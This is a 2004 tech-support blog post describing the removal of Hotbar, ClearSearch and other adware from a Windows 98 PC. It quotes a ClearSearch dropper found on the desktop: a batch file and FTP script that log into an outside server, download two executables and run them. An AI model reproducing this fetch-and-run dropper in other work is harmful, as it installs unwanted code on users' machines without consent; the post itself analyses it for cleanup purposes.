MoonPoint Support Logo

 

Shop Amazon Warehouse Deals - Deep Discounts on Open-box and Used ProductsAmazon Warehouse Deals



Advanced Search
March
Sun Mon Tue Wed Thu Fri Sat
  1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30 31      
2004
Months
Jan Feb Mar
Apr May Jun
Jul Aug Sep
Oct Nov Dec


Sun, Mar 28, 2004 10:20 pm

Windows 98 System Hanging After Login

My mother-in-law told me her Windows 98 PC hangs after she enters her name and password to log into it. She said that even if she waits a long time, she can't get any further. Rebooting the system puts it back in the same state.

When I tested the system, I found I could bring up the Windows Explorer with Ctrl-Alt-Del, which showed the following tasks.

Explorer
Starter
Systray
Scanregw

I ended the Scanregw task, but that didn't help and then I couldn't even bring up the task list again. I rebooted and logged in with my wife's userid and password. When I brought up the task list, again I saw the same tasks, but this time I saw "Not responding" listed after Explorer. I ended the Windows Explorer task and then the system appeared to perform normally. However, when I opened Windows Explorer, I saw "Finalizing installation" continually scrolling across Windows Explorer directly beneath the address bar.

The antivirus program wasn't shown in the system tray. When I went looking for the program with the Windows Explorer, I saw a Hotbar folder under the Program Files folder. I've encountered problems with this adware/spyware program on other systems and would not leave it on any PC I support.

The company that produces this adware/spyware claims "Hotbar enhances and personalizes your Internet & email applications" and can "make your emails unique with hundreds of animations, backgrounds and more" and allows you to "design & send FREE eCards from your existing email". They also state that Hotbar will "brighten your browser with colorful images & enhance your surfing experience with Smart Buttons!" But their "free" software comes with an unseen price tag. This software is likely to significantly impair the performance and stability of your system.

If you click on the Terms of Use and License link you will find the following:

HOTBAR COLLECTS AND STORES INFORMATION ABOUT THE WEB PAGES YOU VIEW AND THE DATA YOU ENTER IN SEARCH ENGINE SEARCH FIELDS WHILE USING THE SOFTWARE. HOTBAR USES THIS INFORMATION TO DETERMINE WHICH ADS AND BUTTONS TO DISPLAY ON YOUR HOTBAR TOOLBARS AND WHICH ADS TO SHOW YOUR BROWSER.

So you are subjecting yourself to "targeted" popup ads, if you install the software.

Hotbar.com states that you can use Windows control panel Add/Remove Programs option to rid yourself of this software by opting to remove Outlook Tools by Hotbar, Web Browser Tools by Hotbar, and Shopper Reports Adapter. Or you can download an uninstaller from the company's website at http://hotbar.com/downloads/HbUninst.exe. Instructions on how to manually remove the software can be found at http://www.kephyr.com/spywarescanner/library/hotbar/index.phtml. I usually rely on Spybot Search & Destroy to rid systems of adware and spyware. Spybot is a free adware/spyware detection and removal program, though you should make a donation to the developer to ensure he can continue to maintain and developer such a worthwhile program.

I also use Bazooka Adware and Spyware Scanner from Kephyr to locate adware/spyware on systems. It is also free, but you really should consider making a donation to help the developer continue his work. Bazooka Adware and Spyware Scanner does an excellent job detecting such software, but can't automatically remove such software. However, the developer does provide instructions on manually removing such software. I've found that Spybot and other adware/spyware removal tools, though they disable and remove most of the bits and pieces of adware/spyware they detect, sometimes will still leave a few files, registry entries, etc. that Bazooka will detect. I can then use the manual removal instructions on the Kephyr website to remove the last remnants of the programs.

I started a Spybot Search & Destroy scan of the system. Spybot found the following adware/spyware.

ClearSearch.Net
Comet Cursors
DSO Exploit
Hotbar
Lycos.SideSearch
Test - Browser Helper Object (BHO)
VX2/e
VX2/f
VX2/h.ABetterInternet

Interestingly, the PestPatrol webpage on ClearSearch reports that "Every time the computer is started, ClearSearch will remove the search-hijacking part of Xupiter, HuntBar/MSLink, CommonName, NewDotNet, the iWon toolbar/search assistant and Netword." So apparently the software will eliminate portions of competing adware/spyware.

I had Spybot remove all of the adware/spyware it found. Spybot couldn't remove all of it immediately, so I rebooted it to let it remove the rest of it at startup. However, the system hung again after Spybot competed its work. I used Ctrl-Alt-Del again and saw a list similar to what I had seen previously.

Explorer
Systray
Scanregw
Rundll32
Starter

I chose to shut down the system, but the system didn't shut down and I couldn't bring up the task list with Ctrl-Alt-Del again. I had to power the system off and on. When I logged in again, I didn't experience the problem with the system hanging. But when I ran Spybot again to make sure that it wasn't seeing any adware/spyware, it reported two registry keys still existed for Hotbar. I had it "fix selected problems" again and then repeated the scan. This time it reported "no immediate threats were found".

As an added precaution, I installed Ad-aware 6.0 on the system. Ad-aware is available in three versions. The standard version is free for non-commercial use. If you wish to have real-time monitoring and blocking capabilities to prevent adware/spyware being installed, purchase one of the other versions. They are relatively inexpensive given the time and aggravation they can spare you by preventing adware/spyware from being installed and subsequently causing crashes, freezes, etc. on your system.

Ad-aware reported it found 28 processes and 149 objects associated with adware/spyware on the system. It isn't unusual for a particular adware/spyware detection program to find adware/spyware that another program has missed or at least some files and registry entries associated with adware/spyware that remain even though the adware/spyware has been rendered ineffective. I've run Spybot after running Ad-aware on systems and found it has detected things that Ad-aware has missed. I usually run Ad-aware, Bazooka Adware and Spyware Scanner, and Spybot Search & Destroy on systems to ensure that no adware/spyware is left on a system. Be sure to update the programs' reference files so that you ensure you are checking for recently detected adware/spyware before you run checks on a system.

Ad-aware reported a number of tracking cookies, which I'm not as concerned about, but objects associated with the adware/spyware listed below were found as well. I'm not concerned about Ad-aware finding Alexa, since the Alexa toolbar isn't installed. Even if a system doesn't have the Alexa toolbar installed, you will likely see Alexa reported by Ad-aware, since it comes bundled with Internet Explorer. The Adware and Under-Wear - The Definitive Guide article has further information on Alexa, as well as other adware/spyware. The article states that in 2001 a $1.9 million fine was levied against the company responsible for Alexa for violating users' privacy.

Alexa
ClearSearch
CometCursor
Coulomb Dialer
HotBar
VX2.BetterInternet
FavoriteMan
WinPup32

Ad-aware reported "Some objects could not be removed" and asked if I wanted to let Ad-aware remove them after the next reboot. The only one it reported was c:\program files\clearsearch\ie_clrsch.dll. I instructed it to remove the object after the next reboot and then rebooted the sysem. Ad-ware completed its check when the system booted and I reran the program yet again for good measure. This time the program didn't find any adware/spyware, reporting "0 New objects" were found.

There are still four items on the desktop that I believe are associated with ClearSearch, though. The file names are as follows:

o
o.bat
ClrSchP028.exe
Calsdr.exe

The batch file o.bat contained the following lines:

if not exist C:\WINDOWSstatuslog ftp -s:o
if exist ClrSchP028.exe ClrSchP028.exe
if exist calsdr.exe calsdr.exe

The first line checks to see if the file WINDOWSstatuslog exists in C:\. If the file doesn't exist, the File Transfer Protocol (FTP) program that comes with windows is started. The "-s" specifies that a script should be executed (you can see other options by typing " ftp -h" at a command prompt). The script is a text file with the name of the file following the colon. In this case the name of the file is "o". After the first line is executed, the batch file will check to see if ClrSchP028.exe and calsdr.exe exist and will execute them if they exist. By checking for their existence first, the batch file avoids the display of an error message by your system.

Looking at the contents of the file titled "o", I see the following:

open downloads.default-homepage-network.com
tmpacct
12345
bin
get ClrSchP028.exe
get calsdr.exe
bye

The first line tells the ftp program to open a connection to the system downloads.default-homepage-network.com. An FTP server will prompt for a userid and password. So the second line transmits a userid of "tmpacct" and the following line transmits the password "12345". On the next line, the "bin" command sets the file transmitssion mode to use binary rather than text transmissions. That command is needed to ensure that there is no attempt to translate end of line markers in files transmitted. The next two "get" commands instruct the FTP server to transmit the two programs, ClrSchP028.exe and calsdr.exe. The last line terminates the connection to the FTP server.

So, if the two files were received from the FTP server they will be executed by the o.bat batch file. Looking at the ClrSchP028.exe file with FileAlyzer, a tool available from the developer of Spybot Search & Destroy, which will allow one to analyze the contents of files, I see there is a company name, Clear Search, listed in the file (see Figure 1). Using FileAlyzer's hex dump capability, I looked for text in the file. I see the program will attempt to contact sds.clrsch.com for updates (see Figure 2).

I deleted the four ClearSearch files from the desktop by right-clicking on them and choosing "delete".

If you have a question about whether a program is spyware you can go to Spychecker and enter the name of the program in its search field. The site also has links to a number of anti-spyware tools. You can also check on a file using Kephyr's searchable database.

I updated the Norton Antivirus 2000 virus definitions and checked the system with that program as well. It found a Trojan on the system, which it quarantined.

Name Virus
do.exe Download.Trojan

While I was checking the folders under C:\Program Files, I noticed a there was a C:\Program Files\ClearSearch folder still on the system. The only file in it, IE_ClrSch.DLL, is a 78 KB file dated 3/22/04 8:13 PM. When I tried to remove the file, I received a message that "the specified file is being used by Windows." I ran another Ad-aware scan, which found ClearSearch again. It reported the following for ClearSearch:

Vendor Type Category Object
ClearSearch Regkey Data Miner HKEY_LOCAL_MACHINE:SOFTWARE\CLRSCH ClearSearch RegValue Data Miner HKEY_CURRENT_USER:Software\Microsoft\Internet Explorer\URLSearchHooks\ ClearSearch Folder Data Miner c:\program files\ClearSearch\ ClearSearch File Data Miner c:\program files\clearsearch\ie_clrsch.dll

When I requested Ad-aware remove the adware/spyware it found, it reported the following:

Some objects could not be removed.
Try closing all open browser windows prior to the removal
If this does not help, reboot and run Ad-aware again.

C:\program
files\clearsearch\ie_clrsch.dll

I had two Internet Explorer windows open while I was running Ad-aware, which might have led to the message. When I rebooted and Ad-aware ran again, it reported it didn't detect any more adware/spyware after it ran. But the ClearSearch folder and ie_clrsch.dll file were still on the system.

I finally resorted to the manual removal instructions at http://www.kephyr.com/spywarescanner/library/clearsearch.bho1/index.phtml . I rebooted the system and hit F8 as it rebooted to obtain the Microsoft Windows 98 Startup Menu. I then chose Safe Mode. I then took the following steps:

  1. Click on Start and select Run
  2. Type regedit and hit enter
  3. Look for the key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000240} and delete it, if found, by clicking on it to select it and then clicking on Edit followed by Delete.
    4. . When you click on it, you will see "IEHooks Class" in the right pane under "Data".
  4. Delete the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{00000000-0000-0000-0000-000000000240}, if it exists. You will see "Clear Search" under the "Data" column in the right-hand pane of the Registry Editor window when you select this key.
  5. Click on "Registry", then "Exit" to exit the registry editor.
  6. Delete the ClearSearch folder under the Program Files folder
  7. Restart the computer in normal mode
  8. Start Internet Explorer, click on Tools, Internet Options, Programs, and then click on the "Reset Web Settings button. When asked if you want to reset your Web settings to their original Internet Explorer defaults, click on "Yes".

References:

    Alexa

  1. SimplytheBest Spyware Information

    2. ClearSearch

  2. PestPatrol
  3. Clearsearch Uninstall
  4. Symantec

    5. CometCursor

  5. and.doxdesk.com
  6. Kephyr

    7. Coulomb Dialer

  7. Kephyr

    8. FavoriteMan

  8. and.doxdesk.com

    9. HotBar

  9. 'Hotbar' spyware program bedevils Windows and should be removed
    By Al Fasoldt
    July 20, 2003
  10. and.doxdesk.com
  11. Kephyr

    12. VX2

  12. PC Sympathy
  13. PestPatrol

    14. Winpup32

  14. Kephyr

[/security/spyware] permanent link

Valid HTML 4.01 Transitional

Privacy Policy   Contact

Blosxom logo